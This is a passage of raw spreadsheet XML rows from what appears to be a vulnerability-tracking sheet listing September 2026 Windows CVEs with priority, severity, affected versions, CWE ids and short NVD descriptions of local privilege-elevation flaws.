      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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1" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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7" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K278" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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79" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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0" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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85" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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86" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
